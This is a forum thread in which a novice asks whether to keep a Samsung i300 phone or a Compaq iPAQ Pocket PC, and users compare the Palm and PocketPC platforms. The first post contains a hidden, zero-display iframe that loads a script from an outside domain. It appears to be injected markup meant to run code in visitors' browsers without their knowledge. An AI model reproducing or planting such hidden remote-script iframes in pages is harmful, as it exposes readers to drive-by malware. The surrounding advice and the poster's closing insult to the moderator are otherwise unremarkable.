+ Reply to Thread

Thread: iPaq + i300

iPaq + i300

I am a novice. I recently received both the Samsung i300 and the Compaq iPAQ 3835 Pocket PC. Any direction this group can offer relative to getting started optimizing use will be appreciated. I'm not sure I need both!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Perhaps I made a mistake!

Is it the fact that I'm inexperienced that my question is ignored?
    Should I go elsewhere?

Administrator

Arrow

Welcome to the board.

Is it the fact that I'm inexperienced that my question is ignored?
    no that is NOT the reason. everyone here at one time was inexperienced in this area.

i cant speak for you. i dont know what your tastes are or what you do in your everyday life, however i can tell you that all you need is the i300. its a phone/pda with color screen and can conect to the internet. i dont see any reason for you to carry both. i dont use an ipaq so i cant tell you any thing positive or negative about it. you may also join a ipaq discussion board to learn more about it.

some here have or have used an ipaq and they may share some of their stories/tips. but rememeber, no one has to reply to any post if they dont want to, so no need to disrespect the board or get angry that no one has yet replied to your thread.

heck, ive posted some things in the past at other sites and have not gotten any response. i didnt post a nasty email, i just mearly went to another source to find out what i needed.

maybe you should do the same.

Well for one the Ipaq is not a Palm device. I can't think of qany reason for needing both. Thats about all I can offer. That is the appeal of the 300/330/ or any other hybrid for that matter. Not that it does so much, as the Ipag may be the better PDA, but that it eiminates the need for both.

PS - I didn't reply because I'm not sure what you are asking.

Here's my 2 cents, having used both platforms.

The iPaq has a more powerful CPU and much more memory and expandability than any PDA/phone. Although a lot of the additional memory and CPU power is required to simply run the PocketPC operating system, you can do "more" things with it. For example, I'm in the computer mapping business and there are some advanced mapping applications that are available for the PocketPC OS that will never be offered on the Palm platform.

This will likely be the case with more complex apps in many industries, mainly because software companies that write Windows software have developers that can relatively quickly create PocketPC apps using that OS's version of Visual Basic.

Finally, in defense of the Palm platform, I want my PDA to basically handle PIM functions. If I want to run real software, I carry a small laptop.

-Raj

Thank You

Thanks Raj and mjorange for your helpful responses.
    Marctronnixx- You're a moderator???? TAKE A LAXATIVE MAN!!!